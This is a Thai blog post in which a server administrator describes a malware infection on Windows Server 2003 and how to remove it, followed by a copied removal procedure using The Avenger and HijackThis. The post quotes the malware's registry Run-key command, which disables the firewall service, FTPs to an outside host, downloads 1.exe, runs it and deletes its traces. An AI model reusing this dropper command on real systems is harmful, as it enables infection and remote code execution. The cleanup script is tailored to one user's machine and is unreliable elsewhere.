ตัว Windows Server 2003 ที่เปิดมาตั้งแต่ปีที่แล้ว จะครบปีที่สอง โดนไวรัส tenga เล่นงานซะอ่วมเลยทีเดียว ลองเข้า regedit ไปเจอ script ที่อยู่ใน HKLM->Software->Microsoft->Windows->CurrentVersion->run เจอตัวนี้ shell มีชุดคำสั่งว่า
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open attack.5166.info > cmd.txt&echo sql>> cmd.txt&echo sql>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f
ตรงนี้มันจะทำงานตอนเรา login เข้ามาในเครื่อง ทำการสั่งชุดคำสั่งให้ไปหยุดการทำงานของการตรวจสอบการ share โดยใช้สิทธิ์ของเราที่เป็นผู้ดูแลระบบ สั่งการ สุดยอดแนวคิดมากครับท่าน
แล้วไปดาวนโหลดพวกพ้องมันจากเว็บที่มันเก็บในไฟล์ attack.5166.info มาเก็บในชุดคำสั่งแบบ text mode แล้วใช้คำสั่งให้มันแปลงกายเป็น binary ที่ชื่อ 1.exe ที่พร้อมจะโจมตีเราได้ทันที แล้วมันก็ลบร่องรอยที่มันเข้ามาโดยการลบชุดคำสั่ง cmd.txt ทิ้ง และ ลบตัวเอง โอ้โห นับถือแนวคิดเลยครับ มันเอาแบบระเบิดฆ่าตัวตายของผู้ก่อการร้ายมาเลยครับลองลบใน registry มันล็อกคอไว้เลยครับ ไม่ยอมให้ลบ
แล้วมาเจอวิธีการลองของดูครับ
1. Please download The Avenger by Swandog46 to your Desktop.
- Click on Avenger.zip to open the file
- Extract avenger.exe to your desktop
2. Copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):
Quote:
| Files to delete: c:\windows\downloaded program files\f3initialsetup1.0.0.15.inf C:\WINDOWS\system32\pxcpyi64.exe C:\WINDOWS\system32\pxinsi64.exe C:\WINDOWS\system32\WINHOST.EXE |
Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.
3. Now, start The Avenger program by clicking on its icon on your desktop.
- Under "Script file to execute" choose "Input Script Manually".
- Now click on the Magnifying Glass icon which will open a new window titled "View/edit script"
- Paste the text copied to clipboard into this window by pressing (Ctrl+V).
- Click Done
- Now click on the Green Light to begin execution of the script
- Answer "Yes" twice when prompted.
- It will Restart your computer. ( In cases where the code to execute contains "Drivers to Unload", The Avenger will actually restart your system twice.)
- On reboot, it will briefly open a black command window on your desktop, this is normal.
- After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
- The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
Rescan with Hijack This, close all browser windows except Hijack This, put a checkmark beside these entries and click fix checked.
O4 - HKLM\..\Run: [Windows NetConfig] WINHOST.EXE
O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbar...p=ZNxmk572YYUS
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.exe.imgfarm.com/images/noc...up1.0.0.15.cab
เมื่อเสร็จแล้วให้ Reboot ดูผลครับ หากใช้ไม่ได้เตรียมหาแผ่นมาได้เลยครับพี่น้อง งานเข้า...........
ไม่มีความคิดเห็น:
แสดงความคิดเห็น
ท่านสามารถแสดงข้อคิดเห็นที่เหมือน หรือ แตกต่างได้ครับ ขอความกรุณาใช้ถ้อยคำที่สุภาพด้วยครับ ขอบคุณครับ